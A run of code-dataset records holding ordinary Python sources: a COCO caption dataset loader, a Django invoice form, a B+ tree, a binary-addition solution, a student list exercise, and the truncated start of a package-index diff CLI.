transformations.keys()}\n    res['N'] = w.values.reshape(shape)\n    return res, axis\n","sub_path":"maxlike/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"532916896","text":"# Для списка реализовать обмен значений соседних элементов,\n# т.е. Значениями обмениваются элементы с индексами 0 и 1, 2 и 3 и т.д.\n# При нечетном количестве элементов последний сохранить на своем месте.\n# Для заполнения списка элементов необходимо использовать функцию input().\n\n# Элементы\nelement1_int = input(\"Введите целое число: \")\nelement2_float = input(\"Введите вещественное число: \")\nelement3_int = input(\"Введите целое число: \")\nelement4_float = input(\"Введите вещественное число: \")\nelement5_str = input(\"Введите строку: \")\n# Список элементов\nelements_list = [element1_int, element2_float, element3_int, element4_float, element5_str]\nprint(elements_list)\n\nnum = 0\n# Обмен значений соседних элементов\nwhile num < len(elements_list):\n    if (num + 1) < len(elements_list):\n        temp = elements_list[num]\n        elements_list[num] = elements_list[num + 1]\n        elements_list[num + 1] = temp\n        num += 2\n    else:\n        num += 2\n\nprint(elements_list)\n","sub_path":"Lesson_2/L2_Task2.py","file_name":"L2_Task2.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"499430461","text":"# coding=utf-8\nimport sys\n\nsys.path.append(\"..\")\nimport nltk\nfrom gensim.models import KeyedVectors\nfrom utils.constants import *\nfrom torch.utils.data import Dataset\nimport random\nimport numpy as np\n\n\ndef tokenize(caption, word2vec):\n    punctuations = ['.', '?', ',', '', '(', ')']\n    raw_text = caption.lower()\n    words = nltk.word_tokenize(raw_text)\n    words = [word for word in words if word not in punctuations]\n    return [word for word in words if word in word2vec]\n\n\ndef rearrange(caption_output, box_output, label_output, threshold):\n    cosine_dist = calculate_dist(caption_output, label_output, dist='Cosine')\n    max_dist = torch.max(cosine_dist, dim=0)[0]\n    max_dist, sorted_indices = torch.sort(max_dist, descending=True)\n    key_indices = sorted_indices[max_dist > threshold]\n    other_indices = sorted_indices[max_dist <= threshold]\n    if key_indices.size(0) == 0:\n        key_indices = sorted_indices[0].unsqueeze(0)\n        other_indices = sorted_indices[1:]\n    key_boxes_criterion = torch.stack([box[0] + box[1] for box in box_output[key_indices]])\n    _, inner_index = torch.sort(key_boxes_criterion)\n    key_indices = key_indices[inner_index]\n    if other_indices.size(0) != 0:\n        other_boxes_criterion = torch.stack([box[0] + box[1] for box in box_output[other_indices]])\n        _, inner_index = torch.sort(other_boxes_criterion)\n        other_indices = other_indices[inner_index]\n    return key_indices, other_indices\n\n\ndef fetch_nouns(caption):\n    noun_list = []\n    for word_tuple in nltk.pos_tag(caption):\n        if word_tuple[1] == 'NN' or word_tuple[1] == 'NNS':\n            noun_list.append(word_tuple[0])\n    return noun_list\n\n\nclass DatasetCOCO(Dataset):\n    def __init__(self, params):\n        assert 'is_training' in params and type(params['is_training']) is bool, \\\n            'param \"is_training\" is required!'\n        assert 'glove_file' in params and type(params['glove_file']) is str, 'param \"glove_file\" is required!'\n        assert 'caption' in params and type(params['caption']) is str, 'param \"caption\" is required!'\n        assert 'bbox' in params and type(params['bbox']) is str, 'param \"bbox\" is required!'\n        assert 'key' in params and type(params['key']) is str, 'param \"key\" is required!'\n        assert 'label_table' in params and type(params['label_table']) is str, 'param \"label_table\" is required!'\n        assert 'max_word_num' in params and type(params['max_word_num']) is int, \\\n            'param \"max_word_num\" is required!'\n        assert 'max_bbox_num' in params and type(params['max_bbox_num']) is int, \\\n            'param \"max_bbox_num\" is required!'\n        assert 'max_label_num' in params and type(params['max_label_num']) is int, \\\n            'param \"max_label_num\" is required!'\n        assert 'word_embedding_dim' in params and type(params['word_embedding_dim']) is int, \\\n            'param \"word_embedding_dim\" is required!'\n        assert 'threshold' in params and type(params['threshold']) is float, 'param \"threshold\" is required!'\n\n        super(DatasetCOCO, self).__init__()\n        self.params = params\n        # dataset\n        self.glove_data = KeyedVectors.load_word2vec_format(params['glove_file'], binary=True)\n        self.caption_data = load_json(params['caption'])\n        self.bbox_data = load_json(params['bbox'])\n        self.key = load_json(params['key'])\n        self.label_table = load_json(params['label_table'])\n        self.embedding_table = self.label_embedding([i for i in range(0, 184)])\n        # print(self.embedding_table.size())\n\n    def __getitem__(self, index):\n        \"\"\"\n        :return:\n            caption_data : embedded caption vectors in shape (caption_len, embedding_dim)\n            box_data: left, top, width, height value of bounding boxes in shape (bbox_num, 4)\n            label_data: label information of bounding boxes in shape(bbox_num)\n            label_embedding_data: label information embedded in shape(bbox_num, label_embedding_dim)\n            caption_length: length of caption data\n            box_length: length of bbox data\n        \"\"\"\n        # Retrieve data from given files\n        item_key = self.key[index]\n        caption = self.caption_data[item_key]\n        annotation = self.bbox_data[item_key]\n\n        # handle caption\n        caption_tokenize = tokenize(random.choice(caption), self.glove_data)\n        noun_list = fetch_nouns(caption_tokenize)\n        noun_embedding = torch.tensor([self.glove_data[word] for word in noun_list])\n        noun_embedding = self.retrieve_label(noun_embedding, self.params['threshold'])\n        caption_embedding = torch.tensor([self.glove_data[word] for word in caption_tokenize])\n\n        # retrieve box information and label information\n        box_output = torch.tensor([box['bbox'] for box in annotation])\n        label_output = torch.tensor([box['category_id'] for box in annotation]).long()\n        label_embedding = self.label_embedding([box['category_id'] for box in annotation])\n        key_index, other_index = rearrange(caption_embedding, box_output, label_embedding, self.params['threshold'])\n        rearrange_index = torch.cat([key_index, other_index])\n\n        # do rearrange\n        box_output = box_output[rearrange_index]\n        label_output = label_output[rearrange_index]\n        label_embedding = label_embedding[rearrange_index]\n\n        # scale box coordination to 0-1\n        box_min_x = torch.min(box_output[:, 0])\n        box_max_x = torch.max(box_output[:, 0] + box_output[:, 2])\n        box_min_y = torch.min(box_output[:, 1])\n        box_max_y = torch.max(box_output[:, 1] + box_output[:, 3])\n        box_output[:, 0] = (box_output[:, 0] - box_min_x) / (box_max_x - box_min_x)\n        box_output[:, 1] = (box_output[:, 1] - box_min_y) / (box_max_y - box_min_y)\n        box_output[:, 2] = (box_output[:, 2]) / (box_max_x - box_min_x)\n        box_output[:, 3] = (box_output[:, 3]) / (box_max_y - box_min_y)\n\n        # calculate label_freq and label_prob\n        label_prob = torch.zeros(self.params['max_label_num'])\n        label_prob[np.unique(label_output)] = 1\n        label_freq = torch.tensor(np.bincount(label_output, minlength=self.params['max_label_num']))\n        # Eliminate the effect of unlabeled items\n        label_prob[-1] = 0\n        label_freq[-1] = 0\n\n        # Soft smoothing\n        idx_neg = label_prob < 0.5\n        idx_pos = label_prob > 0.5\n        rands_pos = torch.rand(label_prob.size(0)) * 0.1\n        rands_neg = torch.rand(label_prob.size(0)) * 0.1\n        label_prob = label_prob + idx_neg.float() * rands_neg - idx_pos.float() * rands_pos\n\n        # Pad outputs\n        caption_padded_embedding = torch.zeros((self.params['max_word_num'], self.params['word_embedding_dim']))\n        noun_padded_embedding = torch.zeros((self.params['max_word_num']))\n        box_padded_output = torch.zeros((self.params['max_bbox_num'], 4))\n        label_padded_output = torch.zeros((self.params['max_bbox_num'])).long()\n        label_order_padded_output = torch.zeros((self.params['max_bbox_num']))\n        label_padded_embedding = torch.zeros((self.params['max_bbox_num'], self.params['word_embedding_dim']))\n        box_length = min(box_output.size(0), self.params['max_bbox_num'])\n        caption_length = min(len(caption_tokenize), self.params['max_word_num'])\n        noun_length = min(noun_embedding.size(0), self.params['max_word_num'])\n\n        # pad outputs\n        caption_padded_embedding[:caption_length, :] = caption_embedding[:caption_length, :]\n        if noun_length != 0:\n            noun_padded_embedding[:noun_length] = noun_embedding[:noun_length]\n        label_padded_embedding[:box_length, :] = label_embedding[:box_length, :]\n        box_padded_output[:box_length, :] = box_output[:box_length, :]\n        label_padded_output[:box_length] = label_output[:box_length]\n\n        # create masks\n        noun_mask = torch.zeros(self.params['max_word_num'])\n        noun_mask[:noun_length] = 1\n        other_mask = label_padded_output != 0\n        other_mask[:key_index.size(0)] = 0\n        key_mask = label_padded_output != 0\n        key_mask[key_index.size(0):] = 0\n\n        # create item order\n        order_list = torch.zeros(184)\n        for index, label in enumerate(label_output):\n            if index >= label_order_padded_output.size(0):\n                break\n            label_order_padded_output[index] = order_list[label]\n            order_list[label] += 1\n\n        return caption_padded_embedding, box_padded_output, label_padded_output, label_padded_embedding, \\\n               caption_length, box_length, key_index.size(0), label_freq, label_prob, noun_padded_embedding, \\\n               noun_length, noun_mask, key_mask, other_mask, label_order_padded_output\n\n    def __len__(self):\n        return len(self.key)\n\n    def label_embedding(self, label_list):\n        embedding_list = []\n        for label in label_list:\n            description = tokenize(self.label_table[str(label)], self.glove_data)\n            description_embedding = torch.mean(torch.tensor([self.glove_data[word] for word in description]), dim=0)\n            embedding_list.append(description_embedding)\n        return torch.stack(embedding_list)\n\n    def retrieve_label(self, noun_embedding, threshold):\n        if noun_embedding.size(0) == 0:\n            # print(self.key[index])\n            return torch.empty(0)\n        cosine_dist = calculate_dist(noun_embedding, self.embedding_table, dist='Cosine')\n        max_dist = torch.max(cosine_dist, dim=0)[0]\n        max_dist, sorted_indices = torch.sort(max_dist, descending=True)\n        key_labels = sorted_indices[max_dist > threshold]\n        # print(index, self.label_table[str(label.item())])\n        return key_labels[:6]\n\n\nif __name__ == '__main__':\n    param = {\n        'is_training': True,\n        'glove_file': \"../config/glove_model.bin\",\n        \"caption\": \"../config/COCO/annotation_train_caption.json\",\n        \"bbox\": \"../config/COCO/annotation_train_bbox.json\",\n        \"key\": \"../config/COCO/annotation_train.json\"\n    }\n    dataloader = DatasetCOCO(param)\n    print(dataloader[0][0].shape)\n","sub_path":"dataloaders/dataset_coco.py","file_name":"dataset_coco.py","file_ext":"py","file_size_in_byte":10100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"335718413","text":"from django.forms import FileField,EmailField,ValidationError,DateField,CharField,TimeField,Form,ModelForm, TextInput, ChoiceField, Select, ModelChoiceField, DateTimeInput\nfrom django.utils import timezone\nfrom django.conf import settings\nfrom invoices.models import Invoice\nfrom clients.models import Client\nfrom datetime import datetime, date \nimport datetime \n\nfrom custom.choices import INVOICE_TYPE\nfrom dateutil.parser import *\n\nclass InvoiceForm(ModelForm):\n\t\n\tdue_date =  DateField(input_formats=settings.DATE_INPUT_FORMATS)\n\tinvoice_date = DateField(input_formats=settings.DATE_INPUT_FORMATS) \n\tstart_time = TimeField(input_formats=settings.TIME_INPUT_FORMATS, required=False)\n\tend_time = TimeField(input_formats=settings.TIME_INPUT_FORMATS, required=False)\n\t#invoice_type = ChoiceField(choices=INVOICE_TYPE, required=False)\n\n\n\tclass Meta:\n\t\tmodel = Invoice\n\t\tfields = ('invoice_number','hours','start_time','end_time','invoice_type','due_date','client','order_number','invoice_date','rate','amount','paid','remarks')\n\t\n\tdef __init__(self,*args, **kwargs):\n\t\t#import pdb; pdb.set_trace()\n\t\tself.user = kwargs.pop('user', None)\n\t\tself.inv = kwargs.pop('invoice_type', None) #kay di mag work anf cleaned_data.get('invoice_type') sa clean_hours\n\t\t#self.start = kwargs.pop('start_time', None)\n\t\t#self.end = kwargs.pop('end_time', None)\n\t\treturn super(InvoiceForm, self).__init__(*args, **kwargs)\n\n\tdef clean_amount(self):\n\t\t\n\t\tinvoice_type = self.cleaned_data.get('invoice_type')\n\t\tamount = self.cleaned_data.get('amount')\n\t\tif invoice_type == 'fixed':\n\t\t\tif not amount:\n\t\t\t\traise ValidationError(\"you pick fixed - amount should have a value\")\n\t\treturn amount\n\t\n\tdef clean_start_time(self):\n\t\tstart_time = self.cleaned_data.get('start_time')\n\t\treturn start_time\n\n\tdef clean_end_time(self):\n\t\tend_time = self.cleaned_data.get('end_time')\t\t\n\t\treturn end_time\n\n\tdef clean_rate(self):\n\t\thours = self.cleaned_data.get('hours')\n\t\trate = self.cleaned_data.get('rate')\n\t\tif rate:\n\t\t\tif not hours:\n\t\t\t\traise ValidationError(\"rate has value but doest have an hour/s\")\n\t\tif not rate and hours:\n\t\t\traise ValidationError(\"hours has value and rate must have value too\")\n\t\treturn rate\n\n\tdef clean_order_number(self):\n\t\tor_no = self.cleaned_data.get('order_number')\n\t\tif or_no:\n\t\t\ttext_or_no = Invoice.objects.filter(order_number__exact=or_no)\n\t\t\tif text_or_no:\n\t\t\t\traise ValidationError(\"Order Number already exists:\")\n\t\treturn or_no\n\n\tdef clean_invoice_number(self):\n\t\tinv_no = self.cleaned_data.get('invoice_number')\n\t\tif inv_no:\n\t\t\ttest_inv_no = Invoice.objects.filter(invoice_number__exact=inv_no)\n\t\t\tif test_inv_no:\n\t\t\t\traise ValidationError(\"Invoice Number already exists:\")\t\t\t\t\t\t\n\t\treturn inv_no\t\n\n\tdef clean_invoice_date(self):\n\t\tin_date = self.cleaned_data.get('invoice_date')\n\t\tif in_date:\n\t\t\tin_date = datetime.datetime.strftime( in_date, '%Y-%m-%d')\n\t\t\tcurrent = datetime.datetime.strftime(datetime.datetime.now(), '%Y-%m-%d')\n\t\t\tif current > in_date:\n\t\t\t\traise ValidationError(\"Datetime should be in future\")\n\t\treturn in_date\n\n\tdef clean_due_date(self):\n\t\tdue_date =  self.cleaned_data.get('due_date')\n\t\tif due_date:\n\t\t\tdue_date = datetime.datetime.strftime( due_date, '%Y-%m-%d')\n\t\t\tcurrent = datetime.datetime.strftime(datetime.datetime.now(), '%Y-%m-%d')\n\t\t\tif current > due_date:\n\t\t\t\traise ValidationError(\"Datetime should be in future\")\n\t\treturn due_date\n\n\tdef clean_hours(self):\n\t\t#import pdb; pdb.set_trace()\n\t\tinvoice_type = self.inv\n\t\thours = self.cleaned_data.get('hours')\n\t\tstart_time = self.cleaned_data.get('start_time')\n\t\tend_time = self.cleaned_data.get('end_time')\n\t\tif invoice_type == 'fixed':\n\t\t\tstart_time = self.cleaned_data.get('start_time')\n\t\t\tend_time = self.cleaned_data.get('end_time')\n\t\tif invoice_type == 'hourly':\n\t\t\tstart_time = self.data['start_time']\n\t\t\tend_time = self.data['end_time']\n\n\t\trate = self.cleaned_data.get('rate')\n\t\t\n\t\tif invoice_type == 'hourly':\n\t\t\tif hours:\n\t\t\t\tif start_time == '' or end_time == '':\t\n\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\tstart_time = parse(start_time).time()\n\t\t\t\t\tend_time = parse(end_time).time()\n\t\t\t\tif start_time and end_time:\n\t\t\t\t\ttime_interval = datetime.datetime.combine(date.today(),end_time) - datetime.datetime.combine(date.today(),start_time)\n\t\t\t\t\ttime_interval = int(time_interval.seconds/3600)\n\t\t\t\t\tif str(time_interval) != str(hours):\n\t\t\t\t\t\traise ValidationError(\"hours should equal to the time interval between start_time and end_time\")\n\t\t\tif not hours:\n\t\t\t\traise ValidationError(\"you pick hourly - hours must have a value\")\n\t\treturn hours\n\n\tdef save(self, commit=True):\n\t\tinstance = super(InvoiceForm, self).save(commit=False)\n\t\t#import pdb; pdb.set_trace()\n\t\tinvoice_type = self.cleaned_data.get('invoice_type')\n\t\tamount = self.cleaned_data.get('amount')\n\t\thours = self.cleaned_data.get('hours')\n\t\tstart_time = self.cleaned_data.get('start_time')\n\t\tend_time = self.cleaned_data.get('end_time')\n\t\trate = self.cleaned_data.get('rate')\n\n\t\tif invoice_type == 'fixed':\n\t\t\tinstance.amount = amount\n\t\t\tinstance.hours = None\n\t\t\tinstance.start_time = None\n\t\t\tinstance.end_time = None\n\t\t\tinstance.rate = None\n\t\t\tinstance.total_amount = amount- instance.paid\n\t\telif invoice_type == 'hourly' :\n\t\t\tinstance.amount = None\n\t\t\tinstance.hours = hours\n\t\t\tinstance.rate = rate\n\t\t\tinstance.start_time = start_time\n\t\t\tinstance.end_time = end_time\n\t\t\tinstance.total_amount = (hours*rate)\n\t\tinstance.owner = self.user\n\t\tif commit:\n\t\t\tinstance.save()\n\t\treturn instance\n\n\nclass InvoiceEmailForm(Form):\n\tsubject = CharField(max_length=100, required=True)\n\ttext = CharField(max_length=255, required=True)\n\n\n\tclass Meta:\n\t\tfields = ('subject','text')\n\n\tdef clean_subject(self):\n\t\tsubject = self.cleaned_data['subject']\n\t\tif not subject:\n\t\t\traise ValidationError(\"This is required\")\n\t\treturn subject\n\n\tdef clean_text(self):\n\t\ttext = self.cleaned_data['text']\n\t\tif not text:\n\t\t\traise ValidationError(\"This is required\")\n\t\treturn text\n\n\n","sub_path":"invoices/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":5878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"117713249","text":"class Solution:\n    def addBinary(self, a: str, b: str) -> str:\n        n_a = len(a)\n        n_b = len(b)\n        long_s, short_s = (a,b) if n_a>=n_b else (b,a)\n        out = []\n        remain = 0\n        for i in range(-1,-len(short_s)-1,-1):\n            remain,val = divmod(remain+int(long_s[i])+int(short_s[i]),2)\n            out.append(str(val))\n        for i in range(-len(short_s)-1,-len(long_s)-1,-1):\n            remain,val = divmod(remain+int(long_s[i]),2)\n            out.append(str(val))\n        if remain==1:\n            out.append(str(1))\n        out.reverse()\n        return \"\".join(out)\n\n","sub_path":"Problem67_Add_Binary.py","file_name":"Problem67_Add_Binary.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"248216366","text":"\"\"\"Simple implementation of a B+ tree, a self-balancing tree data structure that (1) maintains sort\ndata order and (2) allows insertions and access in logarithmic time.\n\"\"\"\n\nclass Node(object):\n    \"\"\"Base node object.\n\n    Each node stores keys and values. Keys are not unique to each value, and as such values are\n    stored as a list under each key.\n\n    Attributes:\n        order (int): The maximum number of keys each node can hold.\n    \"\"\"\n    def __init__(self, order):\n        \"\"\"Child nodes can be converted into parent nodes by setting self.leaf = False. Parent nodes\n        simply act as a medium to traverse the tree.\"\"\"\n        self.order = order\n        self.keys = []\n        self.values = []\n        self.leaf = True\n\n    def add(self, key, value):\n        \"\"\"Adds a key-value pair to the node.\"\"\"\n        # If the node is empty, simply insert the key-value pair.\n        if not self.keys:\n            self.keys.append(key)\n            self.values.append([value])\n            return None\n\n        for i, item in enumerate(self.keys):\n            # If new key matches existing key, add to list of values.\n            if key == item:\n                self.values[i].append(value)\n                break\n\n            # If new key is smaller than existing key, insert new key to the left of existing key.\n            elif key < item:\n                self.keys = self.keys[:i] + [key] + self.keys[i:]\n                self.values = self.values[:i] + [[value]] + self.values[i:]\n                break\n\n            # If new key is larger than all existing keys, insert new key to the right of all\n            # existing keys.\n            elif i + 1 == len(self.keys):\n                self.keys.append(key)\n                self.values.append([value])\n\n    def split(self):\n        \"\"\"Splits the node into two and stores them as child nodes.\"\"\"\n        left = Node(self.order)\n        right = Node(self.order)\n        mid = self.order // 2\n\n        left.keys = self.keys[:mid]\n        left.values = self.values[:mid]\n\n        right.keys = self.keys[mid:]\n        right.values = self.values[mid:]\n\n        # When the node is split, set the parent key to the left-most key of the right child node.\n        self.keys = [right.keys[0]]\n        self.values = [left, right]\n        self.leaf = False\n\n    def is_full(self):\n        \"\"\"Returns True if the node is full.\"\"\"\n        return len(self.keys) == self.order\n\n    def show(self, counter=0):\n        \"\"\"Prints the keys at each level.\"\"\"\n        print(counter, str(self.keys))\n\n        # Recursively print the key of child nodes (if these exist).\n        if not self.leaf:\n            for item in self.values:\n                item.show(counter + 1)\n\nclass BPlusTree(object):\n    \"\"\"B+ tree object, consisting of nodes.\n\n    Nodes will automatically be split into two once it is full. When a split occurs, a key will\n    'float' upwards and be inserted into the parent node to act as a pivot.\n\n    Attributes:\n        order (int): The maximum number of keys each node can hold.\n    \"\"\"\n    def __init__(self, order=8):\n        self.root = Node(order)\n\n    def _find(self, node, key):\n        \"\"\" For a given node and key, returns the index where the key should be inserted and the\n        list of values at that index.\"\"\"\n        for i, item in enumerate(node.keys):\n            if key < item:\n                return node.values[i], i\n\n        return node.values[i + 1], i + 1\n\n    def _merge(self, parent, child, index):\n        \"\"\"For a parent and child node, extract a pivot from the child to be inserted into the keys\n        of the parent. Insert the values from the child into the values of the parent.\n        \"\"\"\n        parent.values.pop(index)\n        pivot = child.keys[0]\n\n        for i, item in enumerate(parent.keys):\n            if pivot < item:\n                parent.keys = parent.keys[:i] + [pivot] + parent.keys[i:]\n                parent.values = parent.values[:i] + child.values + parent.values[i:]\n                break\n\n            elif i + 1 == len(parent.keys):\n                parent.keys += [pivot]\n                parent.values += child.values\n                break\n\n    def insert(self, key, value):\n        \"\"\"Inserts a key-value pair after traversing to a leaf node. If the leaf node is full, split\n        the leaf node into two.\n        \"\"\"\n        parent = None\n        child = self.root\n\n        # Traverse tree until leaf node is reached.\n        while not child.leaf:\n            parent = child\n            child, index = self._find(child, key)\n\n        child.add(key, value)\n\n        # If the leaf node is full, split the leaf node into two.\n        if child.is_full():\n            child.split()\n\n            # Once a leaf node is split, it consists of a internal node and two leaf nodes. These\n            # need to be re-inserted back into the tree.\n            if parent and not parent.is_full():\n                self._merge(parent, child, index)\n\n    def retrieve(self, key):\n        \"\"\"Returns a value for a given key, and None if the key does not exist.\"\"\"\n        child = self.root\n\n        while not child.leaf:\n            child, index = self._find(child, key)\n\n        for i, item in enumerate(child.keys):\n            if key == item:\n                return child.values[i]\n\n        return None\n\n    def show(self):\n        \"\"\"Prints the keys at each level.\"\"\"\n        self.root.show()\n\ndef demo_node():\n    print('Initializing node...')\n    node = Node(order=4)\n\n    print('\\nInserting key a...')\n    node.add('a', 'alpha')\n    print('Is node full?', node.is_full())\n    node.show()\n\n    print('\\nInserting keys b, c, d...')\n    node.add('b', 'bravo')\n    node.add('c', 'charlie')\n    node.add('d', 'delta')\n    print('Is node full?', node.is_full())\n    node.show()\n\n    print('\\nSplitting node...')\n    node.split()\n    node.show()\n\ndef demo_bplustree():\n    print('Initializing B+ tree...')\n    bplustree = BPlusTree(order=4)\n\n    print('\\nB+ tree with 1 item...')\n    bplustree.insert('a', 'alpha')\n    bplustree.show()\n\n    print('\\nB+ tree with 2 items...')\n    bplustree.insert('b', 'bravo')\n    bplustree.show()\n\n    print('\\nB+ tree with 3 items...')\n    bplustree.insert('c', 'charlie')\n    bplustree.show()\n\n    print('\\nB+ tree with 4 items...')\n    bplustree.insert('d', 'delta')\n    bplustree.show()\n\n    print('\\nB+ tree with 5 items...')\n    bplustree.insert('e', 'echo')\n    bplustree.show()\n\n    print('\\nB+ tree with 6 items...')\n    bplustree.insert('f', 'foxtrot')\n    bplustree.show()\n\n    print('\\nRetrieving values with key e...')\n    print(bplustree.retrieve('e'))\n\nif __name__ == '__main__':\n    demo_node()\n    print('\\n')\n    demo_bplustree()","sub_path":"ADSAA/SelfPrintableBplusTree.py","file_name":"SelfPrintableBplusTree.py","file_ext":"py","file_size_in_byte":6672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"20866743","text":"# (C) Copyright 2018 Enthought, Inc., Austin, TX\n# All rights reserved.\n#\n\"\"\"\nBrood-diff is a CLI for calculating the diff between two given brood indices.\n\nThis is useful when determining what is required to sync a customer's\nair-gapped brood instance with the Enthought brood, and is a replacement to\nthe old method of requiring an entire hatcher export of the Enthought brood.\n\nUsage:\n    Get Index:\n    Use this function to generate the json representation of a brood index\n\n    python diff.py get-index -u \n                                   -r \n                                   -p \n                                   -v \n                                   -o \n\n    Index Diff:\n    Use this function to calculate the difference between two brood indices.\n    python diff.py gen-diff -l \n                            -r \n                            -o \n\n\"\"\"\nimport json\nimport sys\nfrom typing import Iterable, NoReturn, Tuple, Union\n\nimport click\nimport requests\n\nfrom brood_diff import valid\n\n\nINDEX_ROUTE = \"api/v1/json/indices\"\nLEGACY_INDEX_ROUTE = \"api/v0/json/indices\"\n\n\n@click.group()\ndef cli():\n    \"\"\" Brood diff is a CLI tool for calculating the difference between\n    two different EDS indices.\n    \"\"\"\n    pass\n\n\n# CLI wrappers #\n\n\n@cli.command(name=\"get-index\")\n@click.option('--url', '-u', type=str,\n              help=\" Must include http or https as needed\")\n@click.option('--repository', '-r', type=str, callback=valid.validate_org_repo,\n              help=(\" Must be in EDS/Hatcher format: `org/repo`\"\n                    \"\\ne.g. enthought/free\"))\n@click.option('--platform', '-p', type=str, callback=valid.validate_platform,\n              help=\" See list-platforms for supported platforms\")\n@click.option('--version', '-v', type=str, callback=valid.validate_version,\n              help=(\" See list-versions for \"\n                    \"supported python version tags\"))\n@click.option('--output', '-o', type=str,\n              help=\" Full path to output json file\")\n@click.option('--sort/--no-sort', default=True,\n              help=(\"Set whether the output should be sorted.\"\n                    \"\\nDefault: --sort\"))\n@click.option('--legacy/--no-legacy', default=False,\n              help=(\"Use --legacy for the legacy v0 api version. Note, this \"\n                    \"should be used only in special circumstances.\"\n                    \"\\nDefault: --no-legacy\"))\ndef cli_get_index(url, repository, platform, version, output, sort, legacy):\n    \"\"\" Get index for a given repo/platform/python-tag from EDS instance\n    located at url specified by -u/--url and write output to file\n    specified by -o/--output.\"\"\"\n\n    org, repo = repository.split(\"/\")\n\n    idx = get_index(url,\n                    org,\n                    repo,\n                    platform,\n                    version,\n                    legacy)\n    click.echo(\"Writing output to json sort={} ...\".format(sort))\n    to_json_file(idx, output, sort=sort)\n\n\n@cli.command(name='full-index')\n@click.option('--url', '-u', type=str,\n              help=\" Must include http or https as needed\")\n@click.option('--repository', '-r', multiple=True, type=str,\n              callback=valid.validate_org_repos,\n              help=(\" Must be in EDS/Hatcher format: `org/repo`\"\n                    \"\\ne.g. enthought/free\"))\n@click.option('--platform', '-p', multiple=True, type=str,\n              callback=valid.validate_platforms,\n              help=\" See list-platforms for supported platforms\")\n@click.option('--version', '-v', multiple=True, type=str,\n              callback=valid.validate_versions,\n              help=(\" See list-versions for \"\n                    \"supported python version tags\"))\n@click.option('--output', '-o', type=str,\n              help=\" Full path to output json file\")\n@click.option('--sort/--no-sort', default=True,\n              help=(\"Set whether the output should be sorted.\"\n                    \"\\nDefault: --sort\"))\n@click.option('--legacy/--no-legacy', default=False,\n              help=(\"Use --legacy for the legacy v0 api version. Note, this \"\n                    \"should be used only in special circumstances.\"\n                    \"\\nDefault: --no-legacy\"))\ndef cli_get_full_index(url, repository, platform, version, output, sort,\n                       legacy):\n    \"\"\" Get full json representation of multiple EDS indices from an EDS\n    instance specified by -u/--url for potentially multiple platforms,\n    repositories, and python versions, and output the full index as a single\n    json file specified by -o/--output.\"\"\"\n\n    gen_full_index(url,\n                   repository,\n                   platform,\n                   version,\n                   output,\n                   sort,\n                   legacy)\n\n\n@cli.command(name=\"gen-diff\")\n@click.option('--local', '-l', type=str,\n              help=\" Full path to json file for local index\")\n@click.option('--remote', '-r', type=str,\n              help=\" Full path to json file for remote index\")\n@click.option('--output', '-o', type=str,\n              help=\" Full path to output json file\")\ndef cli_gen_diff(local, remote, output):\n    \"\"\" Calculate the difference between two EDS indices and output the\n    result as a json file.\n\n    Note, the terminology used is from the perspective of the EDS end-user.\n\n    Thus the local index represents the index you wish to compare to the\n    remote (Enthought) index.\n\n    Example Use Case:\n\n    End-user runs get-index on their local EDS to generate the index of\n    their enthought/free repo as a json file: local.json.\n\n    Next, run the same command against the Brood production server to generate\n    the index of our enthought/free repo as a json file: remote.json.\n\n    Finally run python diff.py gen-diff -l local.json -r remote.json -o\n    output_file.json\n    \"\"\"\n    local_index = from_json_file(local)\n    remote_index = from_json_file(remote)\n    diff = index_diff(local_index, remote_index)\n    to_json_file(diff, output)\n\n\n@cli.command(name=\"full-diff\")\n@click.option('--local', '-l', type=str,\n              help=\" Full path to json file for local index\")\n@click.option('--repository', '-r', multiple=True, type=str,\n              callback=valid.validate_org_repos,\n              help=(\" Must be in EDS/Hatcher format: `org/repo`\"\n                    \"\\ne.g. enthought/free\"))\n@click.option('--platform', '-p', multiple=True, type=str,\n              callback=valid.validate_platforms,\n              help=\" See list-platforms for supported platforms\")\n@click.option('--version', '-v', multiple=True, type=str,\n              callback=valid.validate_versions,\n              help=(\" See list-versions for \"\n                    \"supported python version tags\"))\n@click.option('--output', '-o', type=str,\n              help=\" Full path to output json file\")\n@click.option('--sort/--no-sort', default=True,\n              help=(\"Set whether the output should be sorted.\"\n                    \"\\nDefault: --sort\"))\n@click.option('--legacy/--no-legacy', default=False,\n              help=(\"Use --legacy for the legacy v0 api version. Note, this \"\n                    \"should be used only in special circumstances.\"\n                    \"\\nDefault: --no-legacy\"))\ndef cli_full_diff(local, repository, platform,\n                  version, output, sort, legacy=False):\n    \"\"\" Given a local index son file, calculate the difference between that\n    index and the Enthought production EDS repos specified by the repo,\n    platform, and version options.\n\n    The output is a single json file containing the missing packages.\n    \"\"\"\n    full_diff(local,\n              repository,\n              platform,\n              version,\n              output,\n              sort,\n              legacy)\n\n\n@cli.command(name=\"list-platforms\")\ndef list_platforms():\n    \"\"\" List valid input for platform option.\"\"\"\n    click.echo(\"Valid Platforms:\")\n    for plat in sorted(valid.PLATS):\n        click.echo(plat)\n\n\n@cli.command(name=\"list-versions\")\ndef list_versions():\n    \"\"\" List valid input for version option.\"\"\"\n    click.echo(\"Valid Python Version tags:\")\n    for ver in sorted(valid.VERS):\n        click.echo(ver)\n\n\n# tested functions #\n\n\ndef get_index(url: str, org: str, repo: str, plat: str, pyver: str,\n              legacy: bool = False) -> Union[dict, NoReturn]:\n    \"\"\" Fetch index for a given repo/platform/python-tag.\"\"\"\n    if legacy:\n        resource = \"/\".join((url, LEGACY_INDEX_ROUTE,\n                             org, repo, plat, pyver, \"eggs\"))\n    else:\n        resource = \"/\".join((url, INDEX_ROUTE, org, repo, plat, pyver, \"eggs\"))\n    print(\"Requesting {} ...\".format(resource))\n    r = requests.get(resource)\n    if r.status_code == 200:\n        return r.json()\n    